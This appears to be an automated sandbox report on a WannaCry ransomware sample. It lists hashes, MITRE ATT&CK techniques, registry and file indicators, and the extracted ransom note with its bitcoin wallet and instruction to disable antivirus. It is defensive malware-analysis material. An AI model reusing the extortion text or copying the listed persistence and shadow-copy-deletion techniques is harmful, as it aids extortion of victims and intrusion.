wannacry | ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

Analysis

max time kernel
524s
max time network
525s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
13-06-2024 15:26

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Size

3.4MB
MD5

84c82835a5d21bbcf75a61706d8ab549
SHA1

5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512

90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
SSDEEP

98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops file in Drivers directory 6 IoCs

Processes:

MBAMService.exeMBSetup.exeMBAMInstallerService.exeMBAMService.exe

description	ioc	process
File created	C:\Windows\system32\DRIVERS\mbamswissarmy.sys	MBAMService.exe
File created	C:\Windows\system32\DRIVERS\MbamChameleon.sys	MBAMService.exe
File created	C:\Windows\SysWOW64\drivers\mbamtestfile.dat	MBSetup.exe
File created	C:\Windows\system32\drivers\mbae64.sys	MBAMInstallerService.exe
File created	C:\Windows\system32\DRIVERS\MbamElam.sys	MBAMService.exe
File opened for modification	C:\Windows\system32\DRIVERS\MbamElam.sys	MBAMService.exe

Manipulates Digital Signatures 1 TTPs 25 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

regedit.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\trust	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\trust\CRLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\CTLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\trust\Certificates	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\trust\CTLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Certificates	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\trust	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPublisher	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\CRLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\SystemCertificates\TrustedPeople	regedit.exe

Modifies Installed Components in the registry 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

regedit.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}	regedit.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

MBAMService.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMSwissArmy\ImagePath = "\\SystemRoot\\System32\\Drivers\\mbamswissarmy.sys"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mbamchameleon\ImagePath = "\\SystemRoot\\System32\\Drivers\\MbamChameleon.sys"	MBAMService.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MBAMService.exeMBSetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MBAMService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	MBAMService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MBSetup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	MBSetup.exe

Drops startup file 2 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8177.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD817E.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 62 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exeavast_one_free_antivirus.exetaskse.exe@[email protected]taskdl.exeMBSetup.exeMBAMInstallerService.exetaskse.exe@[email protected]taskdl.exeMBVpnTunnelService.exeMBAMService.exeMBAMService.exeMalwarebytes.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	process
4036	taskdl.exe
2832	@[email protected]
2388	@[email protected]
4384	taskhsvc.exe
3068	taskdl.exe
2980	taskse.exe
68	@[email protected]
600	taskdl.exe
3896	taskse.exe
3656	@[email protected]
5892	taskse.exe
5860	@[email protected]
5996	taskdl.exe
5180	taskse.exe
3404	@[email protected]
5268	taskdl.exe
5980	taskse.exe
6056	@[email protected]
652	taskdl.exe
5788	taskse.exe
5696	@[email protected]
6116	taskdl.exe
4400	taskse.exe
2660	@[email protected]
5152	taskdl.exe
3164	taskse.exe
1912	@[email protected]
2124	taskdl.exe
2696	taskse.exe
6032	@[email protected]
5856	taskdl.exe
5232	taskse.exe
5320	@[email protected]
1348	taskdl.exe
3332	taskse.exe
2704	@[email protected]
5388	taskdl.exe
5752	taskse.exe
5644	@[email protected]
4740	taskdl.exe
5444	avast_one_free_antivirus.exe
496	taskse.exe
5896	@[email protected]
5152	taskdl.exe
3392	MBSetup.exe
5396	MBAMInstallerService.exe
2236	taskse.exe
3760	@[email protected]
5328	taskdl.exe
5392	MBVpnTunnelService.exe
6140	MBAMService.exe
5528	MBAMService.exe
7408	Malwarebytes.exe
6472	taskse.exe
6464	@[email protected]
7220	taskdl.exe
7564	taskse.exe
7576	@[email protected]
7604	taskdl.exe
7100	taskse.exe
8188	@[email protected]
7128	taskdl.exe

Loads dropped DLL 64 IoCs

Processes:

taskhsvc.exeMBAMInstallerService.exeMBVpnTunnelService.exeMBAMService.exeMalwarebytes.exe

pid	process
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
5396	MBAMInstallerService.exe
5396	MBAMInstallerService.exe
5396	MBAMInstallerService.exe
5392	MBVpnTunnelService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5528	MBAMService.exe
5396	MBAMInstallerService.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

4652 icacls.exe

pid	process
4652	icacls.exe

Modifies system executable filetype association 2 TTPs 3 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

regedit.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\lnkfile\shellex\ContextMenuHandlers	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\lnkfile\shellex	regedit.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

regedit.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0113-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0109-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0201-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0377-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0151-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0119-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0140-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0268-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0256-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0024-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0320-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0344-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0174-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0109-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0265-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0005-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0065-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0206-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0168-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0070-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0099-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0230-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0086-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0134-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0191-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0096-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0352-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0128-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0141-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0171-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0308-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0175-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0142-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0370-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0000-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0019-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0324-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0036-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0187-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0331-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0343-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0012-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0164-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0111-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0177-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0331-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0131-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0185-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0066-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0124-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0125-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0234-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0099-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0138-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0267-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0046-ABCDEFFEDCBC}\InprocServer32	regedit.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exeregedit.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svgirwyi764 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\""	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run	regedit.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 7 IoCs

Processes:

wmplayer.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	wmplayer.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmplayer.exeMBAMService.exeMBAMInstallerService.exeunregmp2.exe

description	ioc	process
